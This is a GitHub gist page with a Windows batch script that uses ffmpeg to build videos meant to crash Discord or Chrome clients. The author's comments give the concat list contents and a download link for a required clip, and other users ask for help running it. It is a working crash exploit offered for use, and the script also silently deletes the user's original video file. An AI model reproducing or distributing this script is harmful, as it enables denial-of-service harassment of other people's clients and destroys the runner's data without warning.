Skip to content

Instantly share code, notes, and snippets.

@Incognito-100
Forked from btarg/crashcreator.bat
Last active October 7, 2022 00:00
Show Gist options
  • Save Incognito-100/83e188f3160a5afcd49743e35c7c9d2b to your computer and use it in GitHub Desktop.
Save Incognito-100/83e188f3160a5afcd49743e35c7c9d2b to your computer and use it in GitHub Desktop.
Discord Crash Video Creator
@echo off
title Discord Crash Video Creator
color c
echo ========================= NOTE =========================
echo This script creates videos that crash Discord/Chrome.
echo Hardware acceleration must be enabled for it to work.
echo exploting discord is fun
echo.
echo ========================================================
echo.
pause
WHERE ffmpeg
IF %ERRORLEVEL% NEQ 0 echo ffmpeg wasn't found. Please make sure it is installed correctly. && pause && exit
color 7
cls
set /p filepath=Enter path to video file (or drag and drop the video here):
echo Changing video properties...
ffmpeg -i %filepath% -pix_fmt yuv422p Bunny2.mp4
echo Creating output file...
ffmpeg -f concat -i test.txt -codec copy crasher.mp4
del Bunny2.mp4
del %filepath%
echo.
pause
@BKGstudios
@Incognito-100
Copy link
Author

fixed it and made it support any file name

@tibub
Copy link

tibub commented May 29, 2021

test.txt: Invalid data found when processing input

@Incognito-100
Copy link
Author

test.txt: Invalid data found when processing input

you need this in the test.txt file

file Bunny2.mp4
file red.mp4

and this video
https://www.mediafire.com/file/obe2gejp8xehd8s/red.mp4/file

@Vhyz69420
Copy link

yeah no its not working for me i make the test.txt file and then copy and paste file Bunny2.mp4
file red.mp4 but it does not work please help

@Vhyz69420
Copy link

plus i also donwload the ideo

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment